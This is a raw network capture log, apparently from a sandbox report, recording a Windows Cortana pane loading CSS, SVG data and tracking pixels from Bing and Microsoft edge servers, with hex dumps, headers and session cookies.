.suggestion:hover:not(.sa_hv){background:rgba(255,255,255,.1)}.b_secondaryFocus{font-size
2024-01-26 09:17:42 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 43 6f 6e 74 65 6e 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 2e 77 69 74 68 53 65 63 6f 6e 64 61 72 79 49 63 6f 6e 2e 77 69 74 68 4f 70 65 6e 50 72 65 76 69 65 77 50 61 6e 65 42 74 6e 2e 65 6d 61 69 6c 20 2e 69 63 6f 6e 43 6f 6e 74 61 69 6e 65 72 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 7b 6d 61 72 67 69 6e 3a 30 7d 2e 65 6d 61 69 6c 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 2e 69 63 6f 6e 43 6f 6e 74 61 69 6e 65 72 2c 2e 74 6f 70 52 65 73 75 6c 74 73 20 2e 65 6d 61 69 6c 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 6f 6e 2e 69 63 6f 6e 43 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 36 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 7d 2e 65 6d 61 69 6c 20 2e 73 65 63 6f 6e 64 61 72 79 49 63 Data Ascii: 00004000Content{font-size:15px}body[dir] .withSecondaryIcon.withOpenPreviewPaneBtn.email .iconContainer.secondaryIcon{margin:0}.email .secondaryIcon.iconContainer,.topResults .email .secondaryIcon.iconContainer{width:16px;height:16px}.email .secondaryIc
2024-01-26 09:17:42 UTC	12	IN	Data Raw: 4d 32 49 44 45 30 4c 6a 51 31 0d 0a Data Ascii: M2IDE0LjQ1
2024-01-26 09:17:42 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 4f 44 45 67 4d 54 55 75 4f 54 41 30 4f 53 41 78 4e 43 34 30 4e 7a 67 67 4d 54 55 75 4f 44 6b 32 4d 69 41 78 4e 43 34 30 4f 54 67 32 51 7a 45 31 4c 6a 67 33 4d 44 45 67 4d 54 51 75 4e 54 55 35 4d 53 41 78 4e 53 34 34 4d 7a 6b 78 49 44 45 30 4c 6a 59 78 4e 7a 45 67 4d 54 55 75 4f 44 41 30 4d 69 41 78 4e 43 34 32 4e 7a 49 34 51 7a 45 31 4c 6a 63 31 4f 54 45 67 4d 54 51 75 4e 7a 51 32 4d 53 41 78 4e 53 34 33 4d 44 63 32 49 44 45 30 4c 6a 67 78 4e 44 55 67 4d 54 55 75 4e 6a 55 77 4e 43 41 78 4e 43 34 34 4e 7a 67 79 51 7a 45 31 4c 6a 4d 34 4e 7a 6b 67 4d 54 55 75 4d 54 59 35 4e 53 41 78 4e 43 34 30 4f 54 59 30 49 44 45 31 4c 6a 59 34 4f 44 6b 67 4d 54 51 75 4d 54 59 33 4f 53 41 78 4e 53 34 34 4f 54 6b 35 54 44 45 7a 4c 6a 51 7a 4f Data Ascii: 00004000ODEgMTUuOTA0OSAxNC40NzggMTUuODk2MiAxNC40OTg2QzE1Ljg3MDEgMTQuNTU5MSAxNS44MzkxIDE0LjYxNzEgMTUuODA0MiAxNC42NzI4QzE1Ljc1OTEgMTQuNzQ2MSAxNS43MDc2IDE0LjgxNDUgMTUuNjUwNCAxNC44NzgyQzE1LjM4NzkgMTUuMTY5NSAxNC40OTY0IDE1LjY4ODkgMTQuMTY3OSAxNS44OTk5TDEzLjQzO
2024-01-26 09:17:42 UTC	12	IN	Data Raw: 6a 41 34 4e 44 49 67 4d 54 55 0d 0a Data Ascii: jA4NDIgMTU
2024-01-26 09:17:42 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 75 4e 7a 67 32 4f 53 41 78 4d 79 34 78 4d 7a 49 67 4d 54 55 75 4f 44 45 32 4d 69 41 78 4d 79 34 78 4f 44 4a 44 4d 54 55 75 4f 54 51 30 4e 43 41 78 4d 79 34 7a 4f 54 59 32 49 44 45 32 4c 6a 41 78 4f 44 49 67 4d 54 4d 75 4e 6a 51 34 4f 53 41 78 4e 69 34 77 4d 54 67 79 49 44 45 7a 4c 6a 6b 78 4e 7a 68 61 49 69 42 6d 61 57 78 73 50 53 4a 31 63 6d 77 6f 49 33 42 68 61 57 35 30 4e 56 39 73 61 57 35 6c 59 58 4a 66 4d 54 4d 32 4d 46 38 79 4d 44 49 33 4e 79 6b 69 4c 7a 34 4b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 45 78 4c 6a 4d 78 4d 54 45 67 4e 79 34 7a 4e 54 67 34 4d 30 77 78 4d 53 34 7a 4d 53 41 78 4e 43 34 32 4e 7a 55 78 54 44 45 77 4c 6a 6b 30 4d 44 55 67 4d 54 51 75 4f 44 6b 30 4f 45 77 78 4d 43 34 32 4e 53 41 78 4e 53 34 77 Data Ascii: 00004000uNzg2OSAxMy4xMzIgMTUuODE2MiAxMy4xODJDMTUuOTQ0NCAxMy4zOTY2IDE2LjAxODIgMTMuNjQ4OSAxNi4wMTgyIDEzLjkxNzhaIiBmaWxsPSJ1cmwoI3BhaW50NV9saW5lYXJfMTM2MF8yMDI3NykiLz4KPHBhdGggZD0iTTExLjMxMTEgNy4zNTg4M0wxMS4zMSAxNC42NzUxTDEwLjk0MDUgMTQuODk0OEwxMC42NSAxNS4w
2024-01-26 09:17:42 UTC	12	IN	Data Raw: 65 64 29 3a 66 6f 63 75 73 3a 0d 0a Data Ascii: ed):focus:

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:43 UTC	481	OUT	GET /apc/trans.gif?041a329480e9cb57604d0e3397f69dd9 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5 Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: l-ring.msedge.net Connection: Keep-Alive
2024-01-26 09:17:43 UTC	706	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Last-Modified: Thu, 28 Dec 2023 16:40:37 GMT Accept-Ranges: bytes ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D Access-Control-Allow-Origin: * Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName Timing-Allow-Origin: * X-Content-Type-Options: nosniff X-Endpoint: BL2r8d X-Frontend: AFD X-Machinename: BL2AA2030105039 X-Userhostaddress: 81.181.57.0 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 7E2A4C9B5B7C4BE2B2FB66AEE9B749C7 Ref B: BL2AA2030105039 Ref C: 2024-01-26T09:17:43Z Date: Fri, 26 Jan 2024 09:17:42 GMT Connection: close
2024-01-26 09:17:43 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:43 UTC	853	OUT	GET /rb/73/ortl,cc,nc/QNBBNqWD9F_Blep-UqQSqnMp-FI.css?bu=AdQJ&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51&mkt=de-ch; SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=de&HV=1706260657&IPMH=9aa1009e&IPMID=1696585056799&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E
2024-01-26 09:17:43 UTC	1206	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Mon, 15 Aug 2022 10:51:34 GMT X-EventID: 65b20ac6c29645548a51d9835f3d598c UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: MWHEEEAP0024F52 X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=338347 Expires: Tue, 30 Jan 2024 07:16:50 GMT Date: Fri, 26 Jan 2024 09:17:43 GMT Content-Length: 6 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.07a6dc17.1706260663.406dd009 Timing-Allow-Origin: *
2024-01-26 09:17:43 UTC	6	IN	Data Raw: 7a 7b 61 3a 31 7d Data Ascii: z{a:1}

Timestamp	Bytes transferred	Direction	Data
2024-01-26 09:17:43 UTC	481	OUT	GET /apc/trans.gif?4ec9f13efea672e8986fbf57df3f530e HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5 Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: l-ring.msedge.net Connection: Keep-Alive
2024-01-26 09:17:44 UTC	706	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Last-Modified: Thu, 28 Dec 2023 16:40:37 GMT Accept-Ranges: bytes ETag: 0x0DA2C2C0C44B11E89E6C66FF4F731D7D Access-Control-Allow-Origin: * Access-Control-Expose-Headers: X-EndPoint, X-FrontEnd, X-UserHostAddress, X-MSEdge-Ref, X-MachineName Timing-Allow-Origin: * X-Content-Type-Options: nosniff X-Endpoint: BL2r8e X-Frontend: AFD X-Machinename: BL2AA2030110047 X-Userhostaddress: 81.181.57.0 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 8ED937F0D78F403C9515F2F1C0C3E68B Ref B: BL2AA2030110047 Ref C: 2024-01-26T09:17:43Z Date: Fri, 26 Jan 2024 09:17:43 GMT Connection: close
2024-01-26 09:17:44 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;